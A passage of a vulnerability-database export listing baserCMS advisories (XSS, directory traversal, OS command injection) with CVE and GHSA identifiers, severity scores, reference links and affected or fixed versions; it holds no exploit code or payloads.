url https://github.com/advisories/GHSA-395x-wv32-44v5
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.2
purl pkg:composer/baserproject/basercms@4.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-j37y-gws9-ake9
9
vulnerability VCID-jby7-s5ez-dqb3
10
vulnerability VCID-k5qv-4yp3-zbgf
11
vulnerability VCID-khft-xvrw-g3dr
12
vulnerability VCID-mfm9-gsh3-ubg8
13
vulnerability VCID-nxrf-64er-xbfx
14
vulnerability VCID-p695-t9ye-v3ga
15
vulnerability VCID-pd8c-9d7z-zkhg
16
vulnerability VCID-sqr4-v889-tff8
17
vulnerability VCID-u16w-rbuk-ybfs
18
vulnerability VCID-uedz-j2vn-cbea
19
vulnerability VCID-y2sz-c6vb-pkdp
20
vulnerability VCID-zqd4-rdem-jfgk
21
vulnerability VCID-zsgc-fnen-b7a6
22
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2
aliases CVE-2022-39325, GHSA-395x-wv32-44v5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kmpp-6j49-pqfz
20
url VCID-mfm9-gsh3-ubg8
vulnerability_id VCID-mfm9-gsh3-ubg8
summary 
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts Feature
XSS vulnerability in Blog posts feature to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46996
reference_id
reference_type
scores
0
value 0.01236
scoring_system epss
scoring_elements 0.79576
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46996
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/
url https://basercms.net/security/JVN_00876083
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46996
reference_id CVE-2024-46996
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46996
4
reference_url https://github.com/advisories/GHSA-66jv-qrm3-vvfg
reference_id GHSA-66jv-qrm3-vvfg
reference_type
scores
url https://github.com/advisories/GHSA-66jv-qrm3-vvfg
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg
reference_id GHSA-66jv-qrm3-vvfg
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46996, GHSA-66jv-qrm3-vvfg
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mfm9-gsh3-ubg8
21
url VCID-nxrf-64er-xbfx
vulnerability_id VCID-nxrf-64er-xbfx
summary 
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-26128
reference_id
reference_type
scores
0
value 0.02281
scoring_system epss
scoring_elements 0.85006
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-26128
1
reference_url https://basercms.net/security/JVN_73283159
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://basercms.net/security/JVN_73283159
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-26128
reference_id CVE-2024-26128
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-26128
5
reference_url https://github.com/advisories/GHSA-jjxq-m8h3-4vw5
reference_id GHSA-jjxq-m8h3-4vw5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jjxq-m8h3-4vw5
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5
reference_id GHSA-jjxq-m8h3-4vw5
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2024-26128, GHSA-jjxq-m8h3-4vw5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-nxrf-64er-xbfx
22
url VCID-p695-t9ye-v3ga
vulnerability_id VCID-p695-t9ye-v3ga
summary 
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature
XSS vulnerability in Edit Email Form Settings Feature to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46998
reference_id
reference_type
scores
0
value 0.01064
scoring_system epss
scoring_elements 0.7805
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46998
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_00876083
2
reference_url https://basercms.net/security/JVN_98693329
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/
url https://basercms.net/security/JVN_98693329
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46998
reference_id CVE-2024-46998
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46998
5
reference_url https://github.com/advisories/GHSA-p3m2-mj3j-j49x
reference_id GHSA-p3m2-mj3j-j49x
reference_type
scores
url https://github.com/advisories/GHSA-p3m2-mj3j-j49x
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x
reference_id GHSA-p3m2-mj3j-j49x
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46998, GHSA-p3m2-mj3j-j49x
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-p695-t9ye-v3ga
23
url VCID-pd8c-9d7z-zkhg
vulnerability_id VCID-pd8c-9d7z-zkhg
summary Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-43647
reference_id
reference_type
scores
0
value 0.00572
scoring_system epss
scoring_elements 0.69062
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-43647
1
reference_url https://basercms.net/security/JVN_24381990
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/
url https://basercms.net/security/JVN_24381990
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/
url https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-43647
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-43647
5
reference_url https://github.com/advisories/GHSA-ggj4-78rm-6xgv
reference_id GHSA-ggj4-78rm-6xgv
reference_type
scores
url https://github.com/advisories/GHSA-ggj4-78rm-6xgv
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv
reference_id GHSA-ggj4-78rm-6xgv
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0
purl pkg:composer/baserproject/basercms@5.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0
aliases CVE-2023-43647, GHSA-ggj4-78rm-6xgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pd8c-9d7z-zkhg
24
url VCID-sqr4-v889-tff8
vulnerability_id VCID-sqr4-v889-tff8
summary 
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts and Contents list Feature
XSS vulnerability in Blog posts and Contents list Feature to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46994
reference_id
reference_type
scores
0
value 0.01179
scoring_system epss
scoring_elements 0.79112
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46994
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/
url https://basercms.net/security/JVN_00876083
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46994
reference_id CVE-2024-46994
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46994
4
reference_url https://github.com/advisories/GHSA-wrjc-fmfq-w3jr
reference_id GHSA-wrjc-fmfq-w3jr
reference_type
scores
url https://github.com/advisories/GHSA-wrjc-fmfq-w3jr
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr
reference_id GHSA-wrjc-fmfq-w3jr
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46994, GHSA-wrjc-fmfq-w3jr
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sqr4-v889-tff8
25
url VCID-u16w-rbuk-ybfs
vulnerability_id VCID-u16w-rbuk-ybfs
summary 
baserCMS Directory Traversal vulnerability in Form submission data management Feature
There is a Directory Traversal Vulnerability in Form submission data management Feature to baserCMS.

This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
If you are eligible, please update to the new version as soon as possible.

### Target
baserCMS 4.7.8 and earlier versions

### Vulnerability
There is a possibility that information on the server may be obtained by a user who is logged in to the management screen.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_45547161

### Credits
Shiga Takuma@BroadBand Security, Inc
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-43648
reference_id
reference_type
scores
0
value 0.00289
scoring_system epss
scoring_elements 0.52624
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-43648
1
reference_url https://basercms.net/security/JVN_81174674
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/
url https://basercms.net/security/JVN_81174674
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/
url https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-43648
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-43648
5
reference_url https://github.com/advisories/GHSA-hmqj-gv2m-hq55
reference_id GHSA-hmqj-gv2m-hq55
reference_type
scores
url https://github.com/advisories/GHSA-hmqj-gv2m-hq55
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55
reference_id GHSA-hmqj-gv2m-hq55
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0
purl pkg:composer/baserproject/basercms@5.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0
aliases CVE-2023-43648, GHSA-hmqj-gv2m-hq55
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-u16w-rbuk-ybfs
26
url VCID-uedz-j2vn-cbea
vulnerability_id VCID-uedz-j2vn-cbea
summary 
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
baserCMS is a website development framework. Prior to version 5.0.9, there is an OS Command Injection vulnerability in the site search feature of baserCMS. Version 5.0.9 contains a fix for this vulnerability.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-51450
reference_id
reference_type
scores
0
value 0.00755
scoring_system epss
scoring_elements 0.73646
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-51450
1
reference_url https://basercms.net/security/JVN_09767360
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
